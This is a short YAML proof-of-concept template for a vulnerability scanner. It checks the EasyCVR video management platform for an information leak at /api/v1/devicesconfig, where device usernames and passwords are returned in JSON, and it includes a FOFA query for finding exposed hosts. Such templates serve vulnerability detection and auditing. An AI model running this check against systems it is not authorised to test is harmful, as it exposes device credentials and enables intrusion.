id: poc-yaml-easy-cvr-devicesconfig-info-leak
info:
  name: EasyCVR视频管理平台 devicesconfig 信息泄露漏洞
  severity: medium
  tags:
  - 信息泄露
  finger: EasyCVR
  fofa: title="EasyCVR"
requests:
- method: GET
  path: /api/v1/devicesconfig
  expression: status_code == 200 && contains(body,"\"EasyDarwin\":") && contains(content_type,"application/json")
    && matches(body,"\"DeviceUserName\"\x3a \"[0-9a-zA-Z]+\"") && matches(body,"\"DeviceUserPW\"\x3a
    \"[0-9a-zA-Z]+\"")
variables: {}
transport: http
